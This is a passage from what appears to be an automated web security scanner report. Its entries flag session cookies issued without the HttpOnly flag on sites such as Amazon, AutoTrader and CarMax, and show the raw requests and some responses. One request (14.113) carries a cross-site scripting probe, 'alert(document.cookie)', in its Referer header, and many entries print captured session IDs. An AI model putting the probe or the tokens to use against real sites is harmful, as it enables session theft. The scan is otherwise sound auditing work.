User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.101. http://www.amazon.com/gp/product/0596804946 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0596804946

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=177-3345764-3077262; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=1eR/Gb/7VAeIWvMabpkc9WVd0hSTZUbBg6Yo0T7TCpNQeuSuXtGxH2kY6bTAbin+sFXFOKV5+ocOk7K3+MvDkq0/b9bHz0ODJNpZCfzlXrKaMkf2mByUw4O7H6y0HxLzB0zDpXYjvDZIG9tAgupLtlSzvaVuVoeT9Dw57HxRkT1qFd69t1G9yhJCF1dMGn6BtkhaXaKQIwqLrzarx2jcK/uWu/DYGLfPjmFfwQeqDQqf1Pu2Z67u5nMckQSNU+AXG+4uuNDdjSW4U7/7jDdJMbrRu9ZM6nSR6im5LlC77EvTc5TQz8tq18VhoFQQ90njlOAwxtXq+PDB/vmIDD+i66lzV9/NoXGIbcoNaqBVAhvyZOIdxNL/NLFlkx8w8BdoJeoQup2Vg9OErw1DYhMF9610T7Jg13XTgsW4sfARA2h+TBwY5xsP9yVw1aDK1Hh6; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:19 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.102. http://www.amazon.com/gp/site-directory/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/site-directory/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=192-0833084-3663062; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/site-directory/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.103. http://www.amazon.com/music-rock-classical-pop-jazz/b previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/music-rock-classical-pop-jazz/b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=181-0349682-3421209; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /music-rock-classical-pop-jazz/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.104. http://www.amazon.com/toys/b previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/toys/b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=186-2589969-2680600; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /toys/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.105. http://www.amazon.com/wishlist/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/wishlist/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=186-8078621-7036840; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wishlist/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.106. http://www.amazon.com/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.107. http://www.amazon.com/x22/x3e/x3cli previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/x22/x3e/x3cli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.108. http://www.americascupmedia.com/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.americascupmedia.com
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=69ffa747e74ec3fc598608ba70c8ece5; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.109. http://www.aspirationtech.org/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aspirationtech.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSa1e859be48bff007359d1ff84a233b4d=e6592a496b2ea8707443b03c3285fa30; expires=Thu, 17-Feb-2011 17:42:23 GMT; path=/; domain=.aspirationtech.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.aspirationtech.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.110. http://www.aub.kg/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aub.kg
Path:	/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=0i6vrg28rec1drhtc3kera1913; path=/
umicms_session=1919df951921d97c2f391556dd953a37; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.aub.kg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Cache-Control: post-check=0, pre-check=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=0i6vrg28rec1drhtc3kera1913; path=/
Set-Cookie: umicms_session=1919df951921d97c2f391556dd953a37; path=/
Last-Modified: Fri, 24 Sep 2010 04:34:42 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20408

...    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...

14.111. http://www.autocheck.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.autocheck.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=dmCvyWYCQne4gqVC62; path=/
Apache=173.193.214.243.19751295913252218; path=/; expires=Wed, 23-Feb-11 23:54:12 GMT
referralCookie=dmCvyWYCQne4gqVC62; path=/; expires=Wed, 23-Feb-2011 23:54:11 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?WT.mc_id=1824&siteID=1824 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.112. http://www.autotrader.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=4C16AC510625457D15A58A2D4558BCD7; Path=/
BIGipServerAT-Production_hhtp=3526518282.61475.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

14.113. http://www.autotrader.com/ajax/backButtonFix.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/ajax/backButtonFix.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/backButtonFix.jsp?Log=0&rand=7661 HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585; ATC_PID=-1761786222|959219900373039673; BIRF_Audit=true

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34

/fyc/index.jsp?bkms=1295921992363

14.114. http://www.autotrader.com/hornav/trader/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/hornav/trader/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=D94B6DD5A6F34AF02DDCF09FF98C7E8B; Path=/
BIGipServerAT-Production_hhtp=2167563786.61475.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hornav/trader/index.jsp HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

14.115. http://www.barkerstores.com/soundings/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.barkerstores.com
Path:	/soundings/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=etd10v55qnlha3bgxe4zk255; path=/
chk_support=check; path=/
SOU_CustID=SOU13989; path=/
SOU_CartID=SOU-9E35923E-12511; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /soundings/ HTTP/1.1
Host: www.barkerstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.116. http://www.beirut.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=ael7hgofe5550n3tan4s3cqg47; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.117. http://www.beneteaucountdown.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.beneteaucountdown.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=fe1fba1be91e1e0b7e6fc4c555aa972d; path=/
BBF_Login=deleted; expires=Mon, 25-Jan-2010 13:12:46 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.beneteaucountdown.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=fe1fba1be91e1e0b7e6fc4c555aa972d; path=/
Expires:
Cache-Control:
Pragma:
Set-Cookie: BBF_Login=deleted; expires=Mon, 25-Jan-2010 13:12:46 GMT
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 21847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

14.118. http://www.benjaminsterling.com/experiments/jqShuffle/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.benjaminsterling.com
Path:	/experiments/jqShuffle/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=ef8d21beed05ebe4cdb407a9f1c8923a; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /experiments/jqShuffle/ HTTP/1.1
Host: www.benjaminsterling.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 13:13:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
X-Pingback: http://benjaminsterling.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ef8d21beed05ebe4cdb407a9f1c8923a; path=/
Last-Modified: Tue, 25 Jan 2011 13:13:29 GMT
Location: http://benjaminsterling.com/experiments/jqShuffle/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

14.119. http://www.boats.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.boats.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
JSESSIONID=b7lQLae-ucE5; path=/
Apache=10.71.0.26.1295913435664098; path=/; expires=Wed, 26-Jan-11 23:57:15 GMT; domain=.boats.com
cuid=3425338186237716693; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
SL_Audience=870|Accelerated|799|1|0;Expires=Wed, 23-Jan-13 23:57:15 GMT;Path=/;Domain=.boats.com
SL_UVId=2B0DFE48C52A7F5A;path=/;

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.120. http://www.careersingear.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.careersingear.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=7d38163661ab3fa45bdf4f9462796ad7; path=/; domain=.careersingear.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.careersingear.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.121. http://www.carmax.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.carmax.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

KmxSession_0=cf2c1e2a-8b04-4848-b9f3-7d2c38c4b661; domain=.carmax.com; path=/
KmxCurrSession_0=AB=False&StartDate=1/24/2011 11:04:32 AM&IsIntranet=False&IsHomeOffice=False; domain=.carmax.com; path=/
KMXCOM=UPIJWISKMXCOMWEB052T0x0000000e_0xc6b22d1fCOIKM; expires=Mon, 24-Jan-2011 17:04:31 GMT; path=/
KmxVisitor_0=VisitorID=81b44c0b-cf88-4418-90e8-39a8d968f28d&CookieDate=1/24/2011 11:04:32 AM&Zip=; domain=.carmax.com; expires=Tue, 24-Jan-2012 16:04:32 GMT; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.carmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.122. http://www.carsdirect.com/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.carsdirect.com
Path:	/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=6AFA93D77F160D2887EB6A8A80625603.eqapp5-2-worker; Path=/
BIGipServercarsdirect_pool=3253211308.0.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.carsdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=6AFA93D77F160D2887EB6A8A80625603.eqapp5-2-worker; Path=/
Set-Cookie: TRACKER_ID=-1; Domain=.carsdirect.com; Expires=Sat, 23-Jul-2011 16:04:34 GMT; Path=/
Content-Language: en
Content-Length: 156
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Set-Cookie: BIGipServercarsdirect_pool=3253211308.0.0000; path=/

<link rel="stylesheet" href="http://cdc-img.ibsrv.net/includes/common.css" type="text/css"><html><head><script>document.location="/404error"</script></html>

14.123. http://www.cdearth.com/photo-image-editor.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cdearth.com
Path:	/photo-image-editor.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=112rl5duvqkmmubehjna1j1ij0; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /photo-image-editor.htm HTTP/1.1
Host: www.cdearth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=112rl5duvqkmmubehjna1j1ij0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"
...[SNIP]...

14.124. http://www.corporatehousing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.corporatehousing.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSSRDTQSQ=GHGAKDPCBLMJMEEEJDLHHDIC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.corporatehousing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 132
Content-Type: text/html
Location: default.asp
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSSRDTQSQ=GHGAKDPCBLMJMEEEJDLHHDIC; path=/
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:58:13 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="default.asp">here</a>.</body>

14.125. http://www.digitaltips.org/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.digitaltips.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQACCSATA=CBMAPNKCICCPLJELGPNDBBAG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.digitaltips.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.126. http://www.diigo.com/post previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.diigo.com
Path:	/post

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_smasher_session=cdc373a2e1ecd61c7b92bca1b0e323d3; domain=diigo.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: www.diigo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.127. http://www.directstartv.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.directstartv.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=0vked70odhg1a3p6bv8i242j10; path=/; domain=.directstartv.com
Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Keyword=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
EngineID=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
VisitorID=148575341; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
VisitID=160872488; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
lpd=default; expires=Fri, 25-Mar-2011 16:05:28 GMT; path=/; domain=.directstartv.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.128. http://www.dominionenterprises.com/main/do/Privacy_Policy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dominionenterprises.com
Path:	/main/do/Privacy_Policy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=bb05b7f7a9c540a99a25d950dbe037b3; expires=Thu, 27 Jan 2011 14:02:50 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/do/Privacy_Policy HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:02:50 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=bb05b7f7a9c540a99a25d950dbe037b3; expires=Thu, 27 Jan 2011 14:02:50 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 14:02:50 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Content-Length: 33701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Privacy Policy</title>
<base href="http://www.dominionenterprises.com/" />
<meta http-
...[SNIP]...

14.129. http://www.dominionenterprises.com/main/do/Terms_of_Use previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dominionenterprises.com
Path:	/main/do/Terms_of_Use

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=eeae8ce201e707a408052831b7f8c270; expires=Thu, 27 Jan 2011 14:02:50 GMT; path=/
TSa27990=b9a249217f4497bd6bb8b0395db307ebc6392f532a5a5c034d3eced29c5eca85d241baed; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /main/do/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:02:50 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=eeae8ce201e707a408052831b7f8c270; expires=Thu, 27 Jan 2011 14:02:50 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 14:02:50 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Set-Cookie: TSa27990=b9a249217f4497bd6bb8b0395db307ebc6392f532a5a5c034d3eced29c5eca85d241baed; Path=/
Content-Length: 45884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Terms of Use</title>
<base href="http://www.dominionenterprises.com/" />
<meta http-eq
...[SNIP]...

14.130. http://www.dzone.com/links/add.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dzone.com
Path:	/links/add.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=aaaH3fDCwPO6Ah760t92s; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/add.html?url={u}&title={t} HTTP/1.1
Host: www.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.131. http://www.ebayinc.com/content/press_release/ebay_selects_joomla_open_source_to_foste previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ebayinc.com
Path:	/content/press_release/ebay_selects_joomla_open_source_to_foste

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=56B7E2F4F643F8C3234B643523676F33; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

